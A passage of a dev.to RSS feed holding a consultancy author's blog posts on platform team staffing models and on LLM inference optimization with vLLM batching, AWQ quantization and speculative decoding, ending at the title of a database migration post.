&lt;p&gt;Need help building AI guardrails for your engineering team? We run 9 autonomous agents in production and have learned these lessons the hard way. &lt;a href="https://techsaas.cloud/contact" rel="noopener noreferrer"&gt;Book a consultation&lt;/a&gt; or explore our &lt;a href="https://techsaas.cloud/services" rel="noopener noreferrer"&gt;AI infrastructure services&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>webdev</category>
      <category>tutorial</category>
      <category>programming</category>
      <category>devops</category>
    </item>
    <item>
      <title>Platform Team Staffing Models: Dedicated vs Embedded vs Hybrid — A Decision Framework</title>
      <dc:creator>Yash Pritwani</dc:creator>
      <pubDate>Thu, 07 May 2026 06:00:45 +0000</pubDate>
      <link>https://dev.to/yash_pritwani_07a77613fd6/platform-team-staffing-models-dedicated-vs-embedded-vs-hybrid-a-decision-framework-4dh8</link>
      <guid>https://dev.to/yash_pritwani_07a77613fd6/platform-team-staffing-models-dedicated-vs-embedded-vs-hybrid-a-decision-framework-4dh8</guid>
      <description>&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/platform-team-staffing-dedicated-embedded-hybrid" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/platform-team-staffing-dedicated-embedded-hybrid?utm_source=devto&amp;amp;utm_medium=article&amp;amp;utm_campaign=platform-team-staffing-dedicated-embedded-hybrid" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;




&lt;h1&gt;
  
  
  Platform Team Staffing Models: Dedicated vs Embedded vs Hybrid
&lt;/h1&gt;

&lt;p&gt;You hired 6 platform engineers. Four of them are doing ticket work — resetting credentials, debugging CI pipelines, and answering Slack questions about why the staging environment is down again.&lt;/p&gt;

&lt;p&gt;This isn't a people problem. It's a staffing model problem. The way you organize your platform team determines whether they build leverage or become an expensive help desk.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Three Models
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Model 1: Dedicated (Centralized) Platform Team
&lt;/h3&gt;

&lt;p&gt;The entire platform team sits together, owns a shared roadmap, and builds platform capabilities as internal products.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How it works:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Platform team has its own backlog, sprint cycles, and product manager&lt;/li&gt;
&lt;li&gt;Product teams submit requests through a self-service portal or queue&lt;/li&gt;
&lt;li&gt;Platform engineers don't join product team standups or rituals&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Best for:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Organizations with 5+ product teams&lt;/li&gt;
&lt;li&gt;Mature platforms with established self-service tooling&lt;/li&gt;
&lt;li&gt;Teams where platform work is clearly separable from product work&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The risk:&lt;/strong&gt; Ivory tower syndrome. The platform team builds what they think is important, not what product teams actually need. You end up with a beautifully engineered internal developer portal that nobody uses because it doesn't solve the real friction points.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Mitigation:&lt;/strong&gt; Embed a product manager in the platform team. Their job is to interview product engineers monthly and translate pain points into platform roadmap items.&lt;/p&gt;

&lt;h3&gt;
  
  
  Model 2: Embedded (Distributed) Platform Engineers
&lt;/h3&gt;

&lt;p&gt;Platform engineers are embedded in product teams, attending their standups and working on platform improvements within the product context.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How it works:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Each product team gets 0.5-1 platform engineer&lt;/li&gt;
&lt;li&gt;They work on team-specific platform needs (CI/CD, observability, deployment)&lt;/li&gt;
&lt;li&gt;Coordination happens through a "platform guild" — weekly sync, shared standards&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Best for:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Early-stage platform teams (fewer than 4 platform engineers)&lt;/li&gt;
&lt;li&gt;Organizations where product teams have very different platform needs&lt;/li&gt;
&lt;li&gt;Situations where platform adoption is low and you need missionaries, not builders&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The risk:&lt;/strong&gt; Platform engineers go native. They become the product team's DevOps person, spending 80% of their time on product-specific work and 20% on platform improvements. After 6 months, you have 4 product-team DevOps engineers and no platform.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Mitigation:&lt;/strong&gt; Enforce a 60/40 split — 60% platform work, 40% product-context work. The platform guild lead reviews allocation monthly.&lt;/p&gt;

&lt;h3&gt;
  
  
  Model 3: Hybrid (Core + Liaisons)
&lt;/h3&gt;

&lt;p&gt;A small core team builds and maintains the platform. Each product cluster has a platform liaison who translates between product needs and platform capabilities.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How it works:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Core team (3-5 engineers) owns the platform roadmap and builds shared capabilities&lt;/li&gt;
&lt;li&gt;Liaisons (1 per 2-3 product teams) attend product standups and surface friction&lt;/li&gt;
&lt;li&gt;Liaisons route issues: simple ones they fix themselves, complex ones go to core team backlog&lt;/li&gt;
&lt;li&gt;Monthly "platform review" where liaisons present top friction points to core team&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Best for:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Mid-size organizations (50-200 engineers)&lt;/li&gt;
&lt;li&gt;Organizations transitioning from embedded to dedicated model&lt;/li&gt;
&lt;li&gt;Teams where platform maturity varies across product areas&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The risk:&lt;/strong&gt; Liaisons become bottlenecks. Product teams stop going to self-service and start going to their liaison for everything. The liaison becomes a human API gateway.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Mitigation:&lt;/strong&gt; Liaisons must have a "teach, not do" mandate. If a product engineer asks the same question twice, the liaison's job is to build documentation or tooling — not answer the question again.&lt;/p&gt;

&lt;h2&gt;
  
  
  Decision Matrix
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Factor&lt;/th&gt;
&lt;th&gt;Dedicated&lt;/th&gt;
&lt;th&gt;Embedded&lt;/th&gt;
&lt;th&gt;Hybrid&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Team size (platform)&lt;/td&gt;
&lt;td&gt;6+&lt;/td&gt;
&lt;td&gt;2-4&lt;/td&gt;
&lt;td&gt;4-8&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Product teams&lt;/td&gt;
&lt;td&gt;5+&lt;/td&gt;
&lt;td&gt;2-4&lt;/td&gt;
&lt;td&gt;3-6&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Platform maturity&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;Medium&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Self-service adoption&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;Growing&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Primary risk&lt;/td&gt;
&lt;td&gt;Ivory tower&lt;/td&gt;
&lt;td&gt;Going native&lt;/td&gt;
&lt;td&gt;Liaison bottleneck&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  The Staffing Ratio
&lt;/h2&gt;

&lt;p&gt;Based on industry data and our client work:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Early stage:&lt;/strong&gt; 1 platform engineer per 8-10 product engineers&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Growth stage:&lt;/strong&gt; 1 per 10-15 product engineers&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Mature stage:&lt;/strong&gt; 1 per 15-25 product engineers (self-service reduces load)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;If your ratio is lower than 1:8, you either have extraordinary platform needs or your platform team is doing product work.&lt;/p&gt;

&lt;h2&gt;
  
  
  Real-World Evolution
&lt;/h2&gt;

&lt;p&gt;Most organizations go through this progression:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Phase 1 (0-30 engineers):&lt;/strong&gt; No platform team. Senior engineers do DevOps part-time. This is fine.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Phase 2 (30-80 engineers):&lt;/strong&gt; First 2-3 platform engineers, embedded in product teams. Focus: CI/CD, deployment, basic observability.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Phase 3 (80-200 engineers):&lt;/strong&gt; Hybrid model. Core team builds self-service, liaisons drive adoption.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Phase 4 (200+ engineers):&lt;/strong&gt; Dedicated platform team with product management. Self-service is the default.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Skipping phases causes pain. A 40-person company with a dedicated platform team will waste cycles building infrastructure nobody uses. A 200-person company with embedded platform engineers will have inconsistent tooling across every team.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Metric That Tells You If It's Working
&lt;/h2&gt;

&lt;p&gt;Track one number: &lt;strong&gt;percentage of platform requests resolved through self-service.&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Below 30%: Your platform is a help desk. Invest in self-service tooling.&lt;/li&gt;
&lt;li&gt;30-60%: Growing. Focus on documentation and the top 5 repeat requests.&lt;/li&gt;
&lt;li&gt;60-80%: Healthy. Platform team can focus on capabilities, not support.&lt;/li&gt;
&lt;li&gt;Above 80%: Mature. Consider reducing platform headcount or tackling harder problems.&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;Need help designing your platform team structure? We've helped organizations from 20 to 2000 engineers find the right model. &lt;a href="https://techsaas.cloud/contact" rel="noopener noreferrer"&gt;Book a consultation&lt;/a&gt; or explore our &lt;a href="https://techsaas.cloud/services" rel="noopener noreferrer"&gt;platform engineering services&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>webdev</category>
      <category>tutorial</category>
      <category>programming</category>
      <category>devops</category>
    </item>
    <item>
      <title>LLM Inference Optimization: Batching, Quantization, and Speculative Decoding</title>
      <dc:creator>Yash Pritwani</dc:creator>
      <pubDate>Thu, 07 May 2026 06:00:10 +0000</pubDate>
      <link>https://dev.to/yash_pritwani_07a77613fd6/llm-inference-optimization-batching-quantization-and-speculative-decoding-djp</link>
      <guid>https://dev.to/yash_pritwani_07a77613fd6/llm-inference-optimization-batching-quantization-and-speculative-decoding-djp</guid>
      <description>&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/llm-inference-optimization-batching-quantization" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/llm-inference-optimization-batching-quantization?utm_source=devto&amp;amp;utm_medium=article&amp;amp;utm_campaign=llm-inference-optimization-batching-quantization" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;




&lt;h1&gt;
  
  
  LLM Inference Optimization: Cut Costs 80% Without Cutting Quality
&lt;/h1&gt;

&lt;p&gt;If you're serving LLM inference in production, you're probably paying 5-10x more than you need to. The default configurations of most serving frameworks optimize for simplicity, not efficiency.&lt;/p&gt;

&lt;p&gt;Three techniques — continuous batching, quantization, and speculative decoding — can cut your inference costs by 80% and latency by 60%. Here's how each works and when to use them.&lt;/p&gt;

&lt;h2&gt;
  
  
  Technique 1: Continuous Batching
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Problem with Naive Batching
&lt;/h3&gt;

&lt;p&gt;Traditional batching waits for N requests to arrive, then processes them together. This creates a latency-throughput tradeoff: small batches waste GPU cycles, large batches add waiting time.&lt;/p&gt;

&lt;h3&gt;
  
  
  Continuous Batching (Iteration-Level Scheduling)
&lt;/h3&gt;

&lt;p&gt;Instead of batching at the request level, continuous batching schedules at the token level. New requests can join a running batch between token generations, and completed requests leave immediately.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# vLLM handles this automatically
&lt;/span&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;vllm&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;LLM&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;SamplingParams&lt;/span&gt;

&lt;span class="n"&gt;llm&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;LLM&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;model&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;meta-llama/Llama-3-70B&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;tensor_parallel_size&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;4&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;max_num_batched_tokens&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;32768&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="c1"&gt;# Total tokens across all requests in batch
&lt;/span&gt;    &lt;span class="n"&gt;max_num_seqs&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;256&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;              &lt;span class="c1"&gt;# Max concurrent sequences
&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Impact:&lt;/strong&gt; 3-5x throughput improvement over naive batching. Latency for individual requests stays low because they don't wait for a full batch to form.&lt;/p&gt;

&lt;h3&gt;
  
  
  Benchmarks
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Serving Framework&lt;/th&gt;
&lt;th&gt;Requests/sec (Llama-3-70B)&lt;/th&gt;
&lt;th&gt;P50 Latency&lt;/th&gt;
&lt;th&gt;P99 Latency&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Naive batching&lt;/td&gt;
&lt;td&gt;12&lt;/td&gt;
&lt;td&gt;2.1s&lt;/td&gt;
&lt;td&gt;8.4s&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;vLLM (continuous)&lt;/td&gt;
&lt;td&gt;47&lt;/td&gt;
&lt;td&gt;0.8s&lt;/td&gt;
&lt;td&gt;2.1s&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;TGI (continuous)&lt;/td&gt;
&lt;td&gt;41&lt;/td&gt;
&lt;td&gt;0.9s&lt;/td&gt;
&lt;td&gt;2.4s&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  Technique 2: Quantization
&lt;/h2&gt;

&lt;p&gt;Quantization reduces the precision of model weights from FP16 (16-bit) to INT8 or INT4, dramatically reducing memory usage and increasing inference speed.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Tradeoff
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Precision&lt;/th&gt;
&lt;th&gt;Memory (70B model)&lt;/th&gt;
&lt;th&gt;Speed vs FP16&lt;/th&gt;
&lt;th&gt;Quality Loss&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;FP16&lt;/td&gt;
&lt;td&gt;140GB&lt;/td&gt;
&lt;td&gt;1x (baseline)&lt;/td&gt;
&lt;td&gt;0%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;INT8 (GPTQ)&lt;/td&gt;
&lt;td&gt;70GB&lt;/td&gt;
&lt;td&gt;1.5-2x&lt;/td&gt;
&lt;td&gt;&amp;lt;1%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;INT4 (AWQ)&lt;/td&gt;
&lt;td&gt;35GB&lt;/td&gt;
&lt;td&gt;2-3x&lt;/td&gt;
&lt;td&gt;1-3%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;INT4 (GGUF)&lt;/td&gt;
&lt;td&gt;35GB&lt;/td&gt;
&lt;td&gt;2-3x&lt;/td&gt;
&lt;td&gt;1-5%&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;AWQ (Activation-aware Weight Quantization)&lt;/strong&gt; is our recommendation for production. It preserves quality better than naive INT4 by identifying and protecting salient weight channels.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;vllm&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;LLM&lt;/span&gt;

&lt;span class="c1"&gt;# Serve a 70B model on a single A100 80GB (impossible with FP16)
&lt;/span&gt;&lt;span class="n"&gt;llm&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;LLM&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;model&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;TheBloke/Llama-3-70B-AWQ&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;quantization&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;awq&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;tensor_parallel_size&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="c1"&gt;# Single GPU!
&lt;/span&gt;    &lt;span class="n"&gt;gpu_memory_utilization&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mf"&gt;0.9&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  When NOT to Quantize
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Code generation models (precision matters for syntax)&lt;/li&gt;
&lt;li&gt;Mathematical reasoning (quantization loses numerical precision)&lt;/li&gt;
&lt;li&gt;Models smaller than 13B (the quality loss is proportionally larger)&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Technique 3: Speculative Decoding
&lt;/h2&gt;

&lt;p&gt;The insight: use a small, fast "draft" model to generate candidate tokens, then verify them in parallel with the large model. If the draft model is right (which it often is for common patterns), you get the speed of the small model with the quality of the large one.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;vllm&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;LLM&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;SamplingParams&lt;/span&gt;

&lt;span class="n"&gt;llm&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;LLM&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;model&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;meta-llama/Llama-3-70B&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;speculative_model&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;meta-llama/Llama-3-8B&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="c1"&gt;# Draft model
&lt;/span&gt;    &lt;span class="n"&gt;num_speculative_tokens&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="c1"&gt;# Generate 5 draft tokens per step
&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Impact:&lt;/strong&gt; 1.5-2.5x speedup for generation-heavy workloads. The speedup is highest when the output is predictable (common language patterns, structured data) and lowest for creative/novel outputs.&lt;/p&gt;

&lt;h2&gt;
  
  
  Combining All Three
&lt;/h2&gt;

&lt;p&gt;The techniques stack. Here's the configuration we use for a production chatbot serving 10K requests/hour:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;llm&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;LLM&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;model&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;TheBloke/Llama-3-70B-AWQ&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;     &lt;span class="c1"&gt;# INT4 quantization
&lt;/span&gt;    &lt;span class="n"&gt;quantization&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;awq&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;speculative_model&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;TheBloke/Llama-3-8B-AWQ&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="c1"&gt;# Quantized draft
&lt;/span&gt;    &lt;span class="n"&gt;num_speculative_tokens&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;tensor_parallel_size&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;                 &lt;span class="c1"&gt;# 2x A100 40GB
&lt;/span&gt;    &lt;span class="n"&gt;max_num_batched_tokens&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;32768&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;           &lt;span class="c1"&gt;# Continuous batching
&lt;/span&gt;    &lt;span class="n"&gt;max_num_seqs&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;256&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Results vs naive FP16 serving:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Throughput:&lt;/strong&gt; 12 req/s → 89 req/s (7.4x)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;P50 latency:&lt;/strong&gt; 2.1s → 0.4s (5.2x faster)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;GPU cost:&lt;/strong&gt; 4x A100 80GB → 2x A100 40GB (60% cost reduction)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Quality:&lt;/strong&gt; &amp;lt;2% regression on MMLU benchmark&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Common Mistakes
&lt;/h2&gt;

&lt;p&gt;Before diving into infrastructure recommendations, avoid these pitfalls we've seen repeatedly:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Quantizing without benchmarking on YOUR data.&lt;/strong&gt; Generic benchmarks (MMLU, HumanEval) don't reflect your use case. A model that scores well on academic benchmarks might hallucinate on your domain-specific queries after quantization. Always evaluate on a test set from your actual production traffic.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Using speculative decoding for creative tasks.&lt;/strong&gt; Speculative decoding works best when the output is predictable — structured data, common language patterns, templated responses. For creative writing or novel reasoning, the draft model's predictions are wrong more often, reducing the speedup to near zero.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Ignoring cold start latency.&lt;/strong&gt; vLLM's first request after loading a model takes 5-10x longer than subsequent requests due to CUDA kernel compilation. If your traffic is bursty, keep models warm with synthetic heartbeat requests.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Over-optimizing throughput at the expense of latency.&lt;/strong&gt; Increasing batch size improves throughput but hurts tail latency. For interactive applications (chatbots, autocomplete), optimize for P95 latency first, then tune throughput.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  Infrastructure Recommendations
&lt;/h2&gt;

&lt;h3&gt;
  
  
  For Startups (&amp;lt; $5K/month inference budget)
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Use vLLM with AWQ quantization on a single A100 40GB&lt;/li&gt;
&lt;li&gt;Start with Llama-3-8B-AWQ — surprisingly capable for most use cases&lt;/li&gt;
&lt;li&gt;Add speculative decoding if latency matters more than throughput&lt;/li&gt;
&lt;li&gt;Monitor with Prometheus — track tokens/second, queue depth, and P95 latency&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  For Mid-Market ($5K-$50K/month)
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;vLLM cluster with continuous batching and tensor parallelism&lt;/li&gt;
&lt;li&gt;A/B test INT8 vs INT4 quantization for your specific use case&lt;/li&gt;
&lt;li&gt;Implement request routing: simple queries to 8B model, complex to 70B&lt;/li&gt;
&lt;li&gt;Add semantic caching (Redis + embeddings) for repeated queries — cuts 30-40% of inference calls&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  For Enterprise ($50K+/month)
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Triton Inference Server for multi-model serving and advanced scheduling&lt;/li&gt;
&lt;li&gt;Custom quantization calibrated on your domain data&lt;/li&gt;
&lt;li&gt;Speculative decoding with fine-tuned draft models&lt;/li&gt;
&lt;li&gt;Multi-region deployment with intelligent routing based on model availability and latency&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;Need help optimizing your LLM inference costs? We've deployed inference stacks that serve millions of requests at a fraction of the typical cost. &lt;a href="https://techsaas.cloud/contact" rel="noopener noreferrer"&gt;Book a consultation&lt;/a&gt; or explore our &lt;a href="https://techsaas.cloud/services" rel="noopener noreferrer"&gt;AI infrastructure services&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>webdev</category>
      <category>tutorial</category>
      <category>programming</category>
      <category>devops</category>
    </item>
    <item>
      <title>Zero-Downtime Database Migration: Shadow Writes, Dual-Read, and the 12-Second Cutover</title>
      <dc:creator>Yash Pritwani</dc:creator>
      <pubDate>Thu, 07 May 2026 06:00:07 +0000</pubDate>
      <link>https://dev.to/yash_pritwani_07a77613fd6/zero-downtime-database-migration-shadow-writes-dual-read-and-the-12-second-cutover-2k33</link>
      <guid>https://dev.to/yash_pritwani_07a77613fd6/zero-downtime-database-migration-shadow-writes-dual-read-and-the-12-second-cutover-2k33</guid>
